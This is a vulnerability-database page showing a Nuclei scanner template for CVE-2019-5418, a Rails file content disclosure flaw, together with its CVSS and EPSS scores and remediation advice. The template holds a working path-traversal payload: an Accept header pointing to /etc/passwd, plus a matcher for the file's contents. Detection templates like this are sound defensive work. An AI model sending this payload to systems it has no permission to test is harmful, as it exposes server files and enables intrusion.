Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2019-5418
HistoryApr 08, 2020 - 3:07 p.m.

Rails File Content Disclosure

2020-04-0815:07:10
ProjectDiscovery
github.com
14

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

7.2 High

AI Score

Confidence

High

5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

0.975 High

EPSS

Percentile

100.0%

Rails <5.2.2.1, <5.1.6.2, <5.0.7.2, <4.2.11.1 and v3 are susceptible to a file content disclosure vulnerability because specially crafted accept headers can cause contents of arbitrary files on the target system’s file system to be exposed.

id: CVE-2019-5418

info:
  name: Rails File Content Disclosure
  author: omarkurt
  severity: high
  description: Rails <5.2.2.1, <5.1.6.2, <5.0.7.2, <4.2.11.1 and v3 are susceptible to a file content disclosure vulnerability because specially crafted accept headers can cause contents of arbitrary files on the target system's file system to be exposed.
  impact: |
    This vulnerability can lead to unauthorized access to sensitive information stored on the server.
  remediation: |
    Apply the patch provided by the Rails team or upgrade to a version that includes the fix.
  reference:
    - https://github.com/omarkurt/CVE-2019-5418
    - https://weblog.rubyonrails.org/2019/3/13/Rails-4-2-5-1-5-1-6-2-have-been-released/
    - https://nvd.nist.gov/vuln/detail/CVE-2019-5418
    - https://www.exploit-db.com/exploits/46585/
    - http://lists.opensuse.org/opensuse-security-announce/2019-05/msg00011.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2019-5418
    cwe-id: CWE-22,NVD-CWE-noinfo
    epss-score: 0.97434
    epss-percentile: 0.99939
    cpe: cpe:2.3:a:rubyonrails:rails:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: rubyonrails
    product: rails
  tags: cve,cve2019,rails,lfi,disclosure,edb,rubyonrails

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    headers:
      Accept: ../../../../../../../../etc/passwd{{

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
          - 500
# digest: 4b0a00483046022100bb39db17c9c867c92d33f72fef56c67fa497d1e89c9dc71cde277df972174e9a022100f02cd6356c87d7d584aff94fdb763c948d072ec3cb74da6571c1128d00a5330e:922c64590222798bb761d5b6d8e72950

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

7.2 High

AI Score

Confidence

High

5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

0.975 High

EPSS

Percentile

100.0%